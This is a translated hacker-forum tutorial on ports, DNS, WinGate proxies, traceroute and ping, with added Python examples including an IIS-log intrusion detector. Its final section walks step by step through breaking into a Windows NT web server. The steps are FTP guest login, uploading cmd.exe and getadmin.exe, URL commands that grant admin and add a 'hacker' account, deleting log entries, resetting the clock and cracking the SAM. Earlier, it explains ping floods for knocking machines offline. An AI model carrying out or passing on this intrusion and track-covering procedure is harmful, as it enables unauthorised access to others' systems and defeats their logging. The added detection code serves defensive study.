The Most Basic Understanding To Become A Hacker - Part 2

A port is a 16-bit number (0 to 65535) carried in the TCP (Transmission Control Protocol) or UDP (User Datagram Protocol) header. As everyone knows, a machine (Windows or otherwise) can run many network programs at once; each listening service is bound to its own port, and that port number is how incoming data is delivered to the right program.

For example, a machine with the IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server and so on, all on that one address. When a packet arrives, how does the machine know whether it is meant for the web server, the FTP server or the SMTP server? That is what the port is for. Each service has a well-known default port: FTP uses 21, HTTP (the web) uses 80, POP3 uses 110, SMTP uses 25, and so on.

A network administrator can run a service on a port other than its default, and if you do not know which port a service listens on you cannot talk to it (a port scanner will find it again, of course; moving a port hides nothing from someone who scans). You may have heard of port MAPPING without knowing what it is or how it works. In the sense used here, port mapping simply means making a service answer on a port other than its default. A web server's default port is 80, but you will sometimes see a URL such as http://www.xxx.com:8080 ; the :8080 tells the browser to connect to port 8080 on host xxx instead of port 80, because that host has "mapped" its web service from 80 to 8080.

(HVA document)

Check out part 1: The Most Basic Understanding to Become a Hacker - Part 1

15. What is DNS?

DNS stands for Domain Name System. A DNS server listens on port 53 (UDP, and TCP for large answers and zone transfers), so to query it you send to port 53. The DNS server translates a hostname made of letters into the corresponding numeric IP address (a forward lookup) and, given an address, returns its name (a reverse lookup). Example: localhost --> 127.0.0.1 and 127.0.0.1 --> localhost. (On most systems that particular pair is answered from the local hosts file before DNS is ever asked; for a name such as www.xxx.com the query really does go to a DNS server.)
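Worked example, added here and not part of the HVA document: a minimal DNS query builder and response parser in Python (standard library only), showing what actually travels to and from port 53 for the forward and reverse lookups just described. The reply used in the offline demo is constructed by build_response, not captured from a real server; resolve() performs a real UDP query if you give it a server address. The parser rejects an answer whose transaction ID does not match the query, which is the first line of defence against spoofed replies, and it bounds name-compression pointer chasing so a malicious packet cannot make it loop forever.

```python
import random
import socket
import struct

TYPE_A, TYPE_PTR, CLASS_IN = 1, 12, 1

def encode_name(name):
    """'www.example.com' -> 3 'www' 7 'example' 3 'com' 0 (DNS label wire format)."""
    labels = [l.encode("ascii") for l in name.strip(".").split(".")]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"

def decode_name(msg, off):
    """Decode a possibly compressed name starting at msg[off].
    Returns (name, offset of the first byte after the name as it appears at `off`)."""
    labels, end, jumps = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                 # 2-byte pointer to an earlier copy of the name
            jumps += 1
            if jumps > 16:                   # a looping pointer would otherwise spin forever
                raise ValueError("compression pointer loop")
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), (off if end is None else end)

def build_query(name, qtype=TYPE_A, txid=None):
    """Header (id, flags with RD=1, one question) + question (name, type, class IN)."""
    txid = random.randrange(65536) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)

def build_response(query, rdata, ttl=300):
    """Constructed reply for the offline demo (no real server involved): echoes the question,
    sets QR/RD/RA, and adds one answer whose name is a pointer (0xC00C) to offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    _, qend = decode_name(query, 12)
    qtype = struct.unpack("!H", query[qend:qend + 2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", qtype, CLASS_IN, ttl, len(rdata)) + rdata
    return header + query[12:] + answer

def parse_response(msg, expected_txid):
    """Return [(name, type, ttl, value)] from the answer section. A reply whose transaction
    id does not match the query is rejected: accepting it is how spoofed answers get in."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction id mismatch: possible spoofed reply")
    if flags & 0x000F:
        raise ValueError("server returned RCODE %d" % (flags & 0x000F))
    off = 12
    for _ in range(qdcount):                 # skip the echoed question(s)
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_A and rdlen == 4:
            value = socket.inet_ntoa(msg[off:off + 4])
        elif rtype == TYPE_PTR:
            value, _ = decode_name(msg, off)
        else:
            value = msg[off:off + rdlen].hex()
        answers.append((name, rtype, ttl, value))
        off += rdlen
    return answers

def resolve(name, server, qtype=TYPE_A, timeout=3.0):
    """Real lookup against `server` over UDP port 53 (needs network; unused by the demo)."""
    query = build_query(name, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        data, _ = s.recvfrom(512)
    return parse_response(data, struct.unpack("!H", query[:2])[0])

if __name__ == "__main__":
    q = build_query("localhost", txid=0x1234)                            # forward lookup
    print(parse_response(build_response(q, socket.inet_aton("127.0.0.1")), 0x1234))
    r = build_query("1.0.0.127.in-addr.arpa", TYPE_PTR, txid=0x4321)     # reverse lookup
    print(parse_response(build_response(r, encode_name("localhost")), 0x4321))
```

The reverse lookup is a normal query for the special name 1.0.0.127.in-addr.arpa with type PTR; the address is simply written backwards as labels. In a real resolver the 16-bit transaction ID alone is a weak check (it can be guessed), which is why resolvers also randomise the UDP source port.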

16. Something about WinGate

WinGate is a simple program that lets several machines share one incoming connection: for example, two or more machines can share a single modem. WinGate provides several different proxies, and those proxies can hide you.

How can WinGate hide you? Follow me: telnet to port 23 on a server running the WinGate telnet proxy and you get the WinGate> prompt. At that prompt you type the name of the server you really want, a space, and the port you want to connect to. For example:

CODE
telnet wingate.net
WinGate> victim.com 23

I telnet to port 23 because that is the default port for the telnet proxy when WinGate is installed. The victim now sees the connection coming from the WinGate server's IP address, not ours: the proxy's address is what ends up in the victim's logs. (The WinGate host itself, however, can log your real address.)

How to find a WinGate?

For a static IP: search on Yahoo or a cable-modem search page. Look for cable-modem users, because many of them run WinGate to share their broadband connection with the other machines in the house. Alternatively, use a port scanner or domain scanner and scan for port 1080 (the SOCKS proxy port).

+ For a dynamic IP (the address the WinGate machine was given for its current Internet session) you can use Domscan or another scanning program. With Domscan, enter the IP address in the first box and 23 in the second. When you have the results, telnet to the addresses found (as shown above); if the "WinGate>" prompt appears, you have found a machine running WinGate.

+ In my experience, you can just download a WinGate scanner from the Internet; there are plenty of them around.
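Worked example, added here and not from the HVA or viethacker.net material: a small TCP connect scanner with banner grabbing in Python, which illustrates both the port section at the top of the page (one address, many services; a service moved off its default port is still found by scanning) and the WinGate check just described (connect, read the greeting, look for the "WinGate>" prompt). The services it scans are stand-ins the script starts itself on 127.0.0.1 with constructed banners, so it runs offline; point scan_ports at other hosts only where you are authorised to test.

```python
import socket
import threading

def start_banner_service(banner, host="127.0.0.1"):
    """Start a constructed stand-in service on an OS-chosen port that greets each client with
    `banner` (as FTP, POP3, SMTP and the WinGate telnet proxy do). Returns (port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)                 # lets the serving thread notice the stop flag
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set

def closed_port(host="127.0.0.1"):
    """Reserve a port and release it again so the demo has a port that is (almost certainly) closed."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port

def scan_ports(host, ports, timeout=0.5):
    """TCP connect scan with banner grab. Result per port: first line of the greeting,
    '' if the port is open but silent (HTTP waits for the client to speak first),
    None if the connection was refused or timed out (closed or filtered)."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                results[port] = None
                continue
            try:
                data = s.recv(256)
            except OSError:             # socket.timeout included: open but nothing sent
                data = b""
        text = data.decode("ascii", "replace")
        results[port] = text.splitlines()[0].strip() if data else ""
    return results

def looks_like_wingate(banner):
    """The fingerprint from the text above: a telnet proxy answering with the WinGate> prompt."""
    return banner is not None and "wingate>" in banner.lower()

def find_wingates(host, ports):
    """Ports on `host` whose greeting is the WinGate telnet-proxy prompt."""
    return [p for p, b in scan_ports(host, ports).items() if looks_like_wingate(b)]

if __name__ == "__main__":
    # Constructed banners: an FTP greeting (wording taken from the walkthrough later on this
    # page), a WinGate prompt on a non-default port, and a port with nothing behind it.
    ftp_port, stop_ftp = start_banner_service(b"220 Vdodgy Microsoft FTP Service (Version 3.0).\r\n")
    wg_port, stop_wg = start_banner_service(b"WinGate>")
    dead = closed_port()
    for port, banner in scan_ports("127.0.0.1", [ftp_port, wg_port, dead]).items():
        print("%5d  %s" % (port, "closed" if banner is None else repr(banner)))
    print("WinGate found on ports:", find_wingates("127.0.0.1", [ftp_port, wg_port, dead]))
    stop_ftp(); stop_wg()
```

The scanner does not care which port a service was "mapped" to: it identifies the service by what the service says, not by the port number, which is why moving a service to 8080 or 2121 does not hide it.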

17. Traceroute

Traceroute is a program that lets you follow the path packets take from your computer to a target system on the Internet.

See the following example:

CODE
C:\windows> tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

 1  ms2.2 ms 1 ms ms
 2  xyz.Netzero.com (232.61.41.0)  5 ms  5 ms  5 ms
 3  232.61.41.10 (9.41.41.251)  9 ms  11 ms  13 ms
 4  we21.spectranet.com (196.01.83.12)  535 ms  549 ms  513 ms
 5  isp.net.ny (196.23.0.0)  562 ms  596 ms  600 ms
 6  196.23.0.25 (196.23.0.25)  1195 ms  1204 ms
 7  backbone.isp.ny (198.87.12.11)  1208 ms  1216 ms  1233 ms
 8  asianet.com (202.12.32.10)  1210 ms  1239 ms  1211 ms
 9  south.asinet.com (202.10.10.10)  1069 ms  1087 ms  1122 ms
10  backbone.vsnl.net.in (203.98.46.01)  1064 ms  1109 ms  1061 ms
11  newdelhi-01.backbone.vsnl.net.in (203.102.46.01)  1185 ms  1146 ms  1203 ms
12  newdelhi-00.backbone.vsnl.net.in (203.102.46.02)  1159 ms  1073 ms
13  mtnl.net.in (203.194.56.00)  1052 ms  642 ms  658 ms

I want to know the path from my computer to a host on the Internet whose IP address is 203.94.12.54, so I run tracert against it. As you can see above, packets from my machine to 203.94.12.54 pass through 13 hops on the network. That is the path the packets take.

Take a look at the next example:

CODE
host2# traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
 1  isp.net (202.xy.34.12)  20 ms  10 ms  10 ms
 2  xyz.com (202.xx.12.34)  130 ms  130 ms  130 ms

The first line shows the hostname and IP address of the target system. It also tells us the maximum TTL (30 hops) and the datagram size, 40 bytes (20-byte IP header + 8-byte UDP header + 12 bytes of data).

The second line shows that the first router to receive the datagram is 202.xy.34.12. That datagram was sent with TTL = 1; the router decrements it to 0, drops it, and sends the ICMP error "Time Exceeded" back to the traceroute program, which records the router's address and the round-trip time (three probes per hop, hence three times). Traceroute then sends the next datagram towards the target with TTL = 2.

The third line: xyz.com (202.xx.12.34) receives the datagram with TTL = 1 (the first router already decremented it from 2 to 1). xyz.com is the destination, not a router, so it does not forward the datagram; because traceroute sends its probes to a UDP port that is almost certainly not in use, the host replies with the ICMP error "Port Unreachable". On receiving that message traceroute knows it has reached the target xyz.com and stops.

If a router does not respond within 5 seconds (the default wait), traceroute prints an "*" for that probe (unknown) and carries on sending datagrams towards the destination.

Attention:

  • In Windows: tracert hostname
  • In Unix: traceroute hostname

(viethacker.net documentation)

18. Ping and how to use it

Ping is a very simple idea but very useful for network diagnostics. The word "ping" comes from sonar: a submarine that wants to know whether something is nearby sends out a "ping" sound; if an object is near, the sound bounces off it and comes back as an echo ("pong"), and so the submarine knows something is there.

On the Internet the idea is much the same. The ping command sends an ICMP (Internet Control Message Protocol) Echo Request packet to a host; if the host "pongs" (sends back an ICMP Echo Reply) it exists and is reachable. Ping also tells us how long a packet takes to travel from one computer to the other and back.

Using ping is easy: open an MS-DOS window and type "ping" followed by the address. By default Windows pings 4 times, but you can also type

CODE
ping ip.address -t

which keeps pinging the machine until you stop it (Ctrl+C). To change the size of the ping packet:

CODE
ping -l (size) ip.address

A ping sends a packet to a computer and measures how long it takes to come back; this round-trip time is reported for each reply and averaged over the four pings, and it is a good measure of the speed of the connection. Ping can also be used to slow down or crash a system with a ping flood. Windows 98 hangs after a ping flood (its connection buffer overflows: too many packets, so Windows decides to take a break). A "ping flood" attack eats a lot of your own bandwidth too, so it only works if you have more bandwidth than your opponent (unless the opponent is a Windows 98 machine and you have an ordinary modem, in which case it goes down after roughly a minute of flooding). Flooding is not effective against anything stronger unless you have many lines, or control a fairly large number of servers that all ping the same target, so that the combined bandwidth exceeds the target's.

Attention: the -t option of the DOS/Windows ping does not flood; it just pings the target repeatedly, with a pause between consecutive pings. On Unix and Linux systems you can use ping -f to cause a real flood (it sends packets as fast as the replies come back, and requires root). Any POSIX-style (Portable Operating System Interface) Unix or Linux ping has the -f option; if yours does not, it is not a real Unix/Linux ping.

(HVA and viethacker.net documentation)
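Added example, not from the HVA or viethacker.net documents: a ping in Python that builds the ICMP Echo Request itself, including the RFC 1071 checksum, verifies the checksum and identifier on the Echo Reply, and measures the round-trip time. The raw socket needs root/CAP_NET_RAW on Linux; build_echo_reply_datagram fabricates a reply so the packet code can be checked offline without any network. The interval argument is where the difference between -t (steady pings) and -f (flood, interval 0) lives.

```python
import os
import socket
import struct
import time

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0

def internet_checksum(data):
    """RFC 1071 one's-complement checksum. Summing a correct packet including its own
    checksum field yields 0, which is how a received packet is verified."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo_request(ident, seq, payload=b"\x00" * 56):
    """ICMP Echo Request: type 8, code 0, checksum, identifier, sequence number, payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload

def parse_echo_reply(packet, ident):
    """packet is the raw IPv4 datagram delivered by a SOCK_RAW ICMP socket. Returns
    (seq, payload) if it is an Echo Reply carrying our identifier with a valid checksum,
    else None (other ICMP traffic, somebody else's ping, or a corrupted reply)."""
    if len(packet) < 20:
        return None
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    if len(icmp) < 8:
        return None
    icmp_type, _code, _csum, r_ident, seq = struct.unpack("!BBHHH", icmp[:8])
    if icmp_type != ICMP_ECHO_REPLY or r_ident != ident:
        return None
    if internet_checksum(icmp) != 0:
        return None
    return seq, icmp[8:]

def build_echo_reply_datagram(request, src="127.0.0.1"):
    """Constructed sample of what the kernel hands back for `request` (offline use only):
    a 20-byte IPv4 header plus the same ICMP message with type 0 and a recomputed checksum."""
    _, _, _, ident, seq = struct.unpack("!BBHHH", request[:8])
    body = struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, ident, seq) + request[8:]
    csum = internet_checksum(body)
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, csum, ident, seq) + request[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64,
                     socket.IPPROTO_ICMP, 0, socket.inet_aton(src), socket.inet_aton("127.0.0.1"))
    return ip + icmp

def ping(host, count=4, size=56, interval=1.0, timeout=2.0):
    """Send `count` echo requests and return the round-trip times in ms (timeouts omitted).
    interval=1.0 is the normal pace of `ping -t`; `ping -f` is this same loop with interval 0."""
    dest = socket.gethostbyname(host)
    ident = os.getpid() & 0xFFFF          # lets us ignore replies meant for other ping processes
    rtts = []
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)  # needs root
    sock.settimeout(timeout)
    try:
        for seq in range(1, count + 1):
            start = time.monotonic()
            sock.sendto(build_echo_request(ident, seq, b"\x00" * size), (dest, 0))
            try:
                while True:                               # skip replies that are not ours
                    data, _ = sock.recvfrom(2048)
                    parsed = parse_echo_reply(data, ident)
                    if parsed and parsed[0] == seq:
                        break
                rtt = (time.monotonic() - start) * 1000
                rtts.append(rtt)
                print("Reply from %s: bytes=%d seq=%d time=%.1fms" % (dest, size, seq, rtt))
            except socket.timeout:
                print("Request timed out.")
            time.sleep(interval)
    finally:
        sock.close()
    if rtts:
        print("Average round-trip time: %.1f ms over %d replies" % (sum(rtts) / len(rtts), len(rtts)))
    return rtts

if __name__ == "__main__":
    ping("127.0.0.1")
```

The identifier and sequence number are what let a reply be tied to the request that caused it; a host that answers with a bad checksum or a foreign identifier is ignored rather than counted as "alive".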

19. Intrusion of Windows NT from the Internet

This is the first hack lesson I did when I started studying hacking, and now I will show it to you. You will need some time for it, because it is easy but also hard. Let's begin.
First you need to find a server running IIS.

Next, open DOS and type "ftp" followed by the host name. For example:

C:\> ftp www.dodgyinc.com

(This site still worked when I practised on it; I do not know whether it has been fixed since. If you have another site, please post it so everyone can try it offline.)

If the connection succeeds you will see lines similar to these:

CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):

The banner above contains very important information: it tells us the NetBIOS name of the computer is "Vdodgy". From that we can infer the account NT uses for anonymous web access, which is what we will exploit: unless it has been renamed, the anonymous account that IIS creates is named IUSR_<machine name>, here "IUSR_VDODGY". Remember it; it will be useful. Enter "anonymous" as the user and the following appears:

CODE
331 Anonymous access allowed, send the identity (email) as password.
Password:

The password can be anything, but try "anonymous" first. If that is refused, reconnect to the FTP server and this time do not use anonymous: log in as "Guest" and try "guest" (or anything at all) as the password.

Now enter this command in the FTP session:

CODE
cd /c

If you got in, you should now see the "cgi-bin" directory. With luck it is easy, because the administrators have put "cgi-bin" right where we landed, to make managing the server easier for themselves. The cgi-bin directory may contain programs that you can run from your web browser. Let's start "stirring" things up.

First, change into the cgi-bin directory and issue the "binary" command (you may not need it), then upload cmd.exe into it ("put cmd.exe"). Next you need the hacking tools to install in this directory: search the net for the two essential files, "getadmin.exe" and "gasys.dll". Download them and upload them into cgi-bin as well. Then close the DOS window.

Now type the following into your browser:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

After a few seconds you get a reply like this:

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations, now account IUSR_VDODGY have admin rights!

So the account the web server runs as now has administrator rights; what you need next is an account of your own. Type the following into IE:

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

This runs "net user hacker toilahacker /add" on the server (the %20 is an encoded space), creating a login account; the author used the name anhdenday with the password toilahacker, and the rest of this walkthrough uses that name. Now make the new user an administrator by typing into IE:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

That's it. Disconnect, go to Start Menu -> Find -> Computer and search for "www.dodgyinc.com". When it is found, explore it: NT will either open its shares directly or ask for a user name and password (mine are user anhdenday, password toilahacker).

One problem: everything you did on this system has been logged. To remove your traces go to "\winnt\system32\logfiles", open the log files, delete the entries relating to you and save them. You can also change the server's system date, which alters the timestamps recorded from then on, with the following URL:

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

Then delete "getadmin.exe" and "gasys.dll" from "cgi-bin". The point of all this is to "steal" the administrator's password so that next time you can log in as a valid user: look for the SAM file on the system (it holds the password hashes of the administrator and the other users; note that NT keeps the live SAM locked while it is running, so it cannot simply be copied from its usual location) and run it through "L0phtCrack" to crack the passwords (I have already posted a tutorial on using "L0phtCrack v3.02"; study it yourself). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=

Once you have cracked the user and admin passwords, delete the account you created (my "anhdenday") to be safe. Inside the system you can do as you like, but do not delete their documents; that would be a terrible thing to do to them.

How do you feel, not too bad, is it? When I first tried this hack I spent a good four hours tinkering; once you are familiar with it, the second time takes much less.
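Added example, not from the original post: the defender's view of the walkthrough above. Every step was requested through the web server, so each one leaves a line in the IIS log before the log is edited; the Python below parses a W3C-format IIS log and flags the pattern (getadmin.exe invoked through CGI, cmd.exe run with /c, net user ... /add). The log lines are constructed to mirror the URLs in the walkthrough, not captured from a real server; the client addresses, timestamps, status codes and the search.exe line are assumptions. Because the final steps of the walkthrough are deleting the log entries and resetting the clock, a check like this only helps if the log is shipped off the host as it is written.

```python
from urllib.parse import unquote

# Constructed sample IIS log in W3C extended format, mirroring the URLs in the walkthrough.
# Addresses, times, status codes and the search.exe line are assumptions, not real traffic.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Server 3.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-30 22:10:01 10.1.2.3 GET /index.htm - 200
2003-04-30 22:11:15 10.1.2.3 GET /cgi-bin/getadmin.exe IUSR_VDODGY 502
2003-04-30 22:11:40 10.1.2.3 GET /cgi-bin/cmd.exe /c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add 200
2003-04-30 22:12:05 10.1.2.3 GET /cgi-bin/getadmin.exe hacker 502
2003-04-30 22:12:30 10.1.2.3 GET /cgi-bin/cmd.exe /c%20date%2030/04/03 200
2003-04-30 22:13:00 10.9.9.9 GET /cgi-bin/search.exe q=widgets 200
"""

def parse_iis_log(text):
    """Turn a W3C extended log into a list of dicts keyed by the names in the #Fields line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):   # IIS encodes spaces, so a plain split works
            records.append(dict(zip(fields, values)))
    return records

def classify(record):
    """Return the reasons one request looks like the intrusion above ([] if it looks clean)."""
    stem = record["cs-uri-stem"].lower()
    base = stem.rsplit("/", 1)[-1]
    raw_query = record.get("cs-uri-query", "-")
    query = unquote(raw_query).lower()              # %20 -> space, so "net.exe user" is visible
    reasons = []
    if base in ("cmd.exe", "getadmin.exe"):
        reasons.append("%s executed through the web server" % base)
    if base == "cmd.exe" and "/c" in query:
        reasons.append("shell command via cmd.exe: " + query)
    if ("net.exe" in query or "net user" in query) and "/add" in query:
        reasons.append("local account creation: " + query)
    if base == "getadmin.exe" and raw_query not in ("-", ""):
        reasons.append("privilege escalation attempt against account " + raw_query)
    return reasons

def detect_intrusion(text):
    """Scan a log and return (time, client ip, reasons) for every suspicious request."""
    alerts = []
    for rec in parse_iis_log(text):
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["time"], rec["c-ip"], reasons))
    return alerts

def attackers(alerts):
    """Client addresses behind at least one alert, for a block list or a hunt."""
    return sorted({ip for _, ip, _ in alerts})

if __name__ == "__main__":
    for when, ip, reasons in detect_intrusion(SAMPLE_LOG):
        print(when, ip)
        for r in reasons:
            print("   ", r)
    print("attacker addresses:", attackers(detect_intrusion(SAMPLE_LOG)))
```

The rules key on what the request does (an executable in a web directory, a shell invoked with /c, an account created) rather than on the exact file names, so renaming getadmin.exe to something innocent does not hide the net user ... /add that follows it.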

In part 3 I will cover the Linux operating system, how to break the password protection of a website, how to hack a simple website, and so on.

End of part 2

Author: Anhdenday - HVAOnline.net